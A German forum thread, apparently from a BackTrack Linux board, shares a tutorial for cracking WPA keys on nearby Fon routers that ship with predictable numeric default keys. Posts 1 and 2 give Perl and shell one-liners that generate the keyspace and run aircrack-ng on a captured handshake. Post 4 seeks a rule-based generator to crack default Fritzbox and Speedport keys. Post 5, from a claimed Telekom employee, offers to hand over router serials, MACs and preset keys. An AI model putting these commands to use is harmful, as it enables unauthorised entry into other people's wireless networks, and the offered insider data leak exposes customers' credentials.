Results 1 to 5 of 5

Thread: Video "How to Bruteforce a nearby WPA Fon Router"

  1. #1

    Default Video "How to Bruteforce a nearby WPA Fon Router"

    In diesem Tutroial geht es darum, wie ein Fon Router zu knacken ist, die Schwachstelle liegt hierbei an den "Standard" WPA Keys die bei der Auslieferung des Fon's gesetzt sind.

    In der Praxis sind diese meistens nur Zahlen meistens mit 870250xxxxx. Im Klartext bedeutet dies, dass sich nur die letzten 5 Ziffern ändern. Ein Programm das uns genau eine Textdatei mit allen Möglichkeiten hab ich hier:

    Code:
    #!/usr/bin/perl
    $n = 8702000000;
    while ($n <= 8702555555) { system ("echo $n >> numbers.txt"); $n++; }
    So, dann wird eine Textdatei erstellt, die Ihr dann mit hilfe von Aircrack und dem WPA handshake des Routers verwenden könnt.

    aircrack-ng fon-01.cap -w /root/fon/numbers.txt

    Das wars auch schon hoffe es hilft dem ein oder anderen irgendwie weiter.

    Link zum Video

    YouTube - How to Bruteforce a nearby WPA Fon Wlan [3]

    mfg Reeth
    www.myownremote.blogspot.com

  2. #2
    Junior Member cleguevara's Avatar
    Join Date
    Dec 2007
    Posts
    97

    Default

    Erstmal: Nettes Video!

    Quote Originally Posted by Reeth View Post
    Code:
    #!/usr/bin/perl
    $n = 8702000000;
    while ($n <= 8702555555) { system ("echo $n >> numbers.txt"); $n++; }
    alternativ kann man das auch ohne Umwege über Perl machen - komplett ohne Script einfach eine Zeile direkt in der Shell:
    Code:
    i=8702500000; while [[ $i -le 8702580000 ]] ;do i=`expr $i + 1`;echo $i >> numbers.txt; done
    ...performancetechnisch n bisschen schneller und man muss gar nicht erst nano auspacken ;-)

    wenn mans dann auch noch ganz spartanisch ohne wordlist-textfile machen will (im Endeffekt noch effizienter) kann man den kram auch direkt an aircrack-ng pipen (dabei nicht " -" am Ende vergessen):
    Code:
    i=8702500000; while [[ $i -le 8702580000 ]] ;do i=`expr $i + 1`;echo $i; done | aircrack-ng fon-01.cap -w -
    ...just my 2 cents

  3. #3
    Just burned his ISO
    Join Date
    Dec 2009
    Posts
    1

    Default

    für welche router soll das gedacht sein thx

  4. #4
    Just burned his ISO
    Join Date
    Dec 2009
    Posts
    1

    Lightbulb preset PSK Key Dictionary für AVM

    hallo allerseits,

    also....die Fritzbox und Router von der T-Com (welche eine AVM MAC Adresse haben) sind mit einem standart PSK Schlüssel ausgestattet.

    Dieser ist entweder 13- oder 16-stellig und nur numerisch oder 9-stellig mit drei vorgegebenen Zeichen wie z.b. "SP-XXXXXXXXX"

    Ein Numerische Passwortliste wäre selbst bei 13 Stellen "etwas groß".

    Bei den Standart Keys der Fritzbox der zweiten "Generation" mit den 16 Zeichen Schlüsseln sind mir ein paar Dinge aufgefallen.

    M.e. ist es möglich die Größe der numerischen Liste erheblich zu reduzieren und mit Start-/Endwerten sie zu splitten.

    Nun suche ich jemanden, der einen Dictionary Generator programmieren kann/will. Am liebsten unter Linux....nur mit wiederwillen unter Windoofs

    Im Prinzip ist es ein Zahlengenerator.
    Eine Zahl wird generiert und durchläuft drei (später vllt auch mehr) Regelprüfungen. Erst wenn sie alle besteht, wird sie in die Datei geschrieben. Alle anderen werden verworfen.

    So würde eine reale Chance bestehen ein Handshake einer Fritzbox durch eine Bruteforce Attacke zu brechen (!)

    Ich bin überzeugt davon auch noch weitere Regeln zu finden. Und mit Sicherheit gibt es auch Regeln für die anderen Router.

    Bestes Beispiel ist das mit den BT/Pirelli Routern.
    Bei vielen Speedports 5xx und 7xx sind mir auch Parallelen aufgefallen. Dort würde es helfen, wenn ich mehr Daten der Router hätte. Also eine Liste von Routern mit Typ, Seriennummer, MAC, voreingestellter PSK und ESSID.

    Was haltet ihr davon?

    greetz wifish

  5. #5
    Just burned his ISO
    Join Date
    Jan 2011
    Posts
    2

    Default AW: Video "How to Bruteforce a nearby WPA Fon Router"

    Die Daten der Router kann ich dir besorgen, arbeite bei der Telekom, einige sachen kann ich dir jetzt schon sagen:

    ESSID: WLAN-XXXXXX <- wobei X für zahlen steht, "meißtens" 6 stellig

    Das mit der Mac ist so ne sache, die ändert sich ja immer oder irre ich mich da?
    der WLAn-Key fängt IMMER mit SP-XXXXXXXXXXXXXX 13 oder 16 zahlen.

    MFG Cruzander

    PS: Wer zeit hat und lust kann mir auch weiterhelfen :-)
    Hab da auch ein Problem und das auch schon im Forum gepostet, leider bekomme ich keine antworten bzw. hilfe, hier der link:
    http://www.backtrack-linux.org/forum...tutorials.html

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •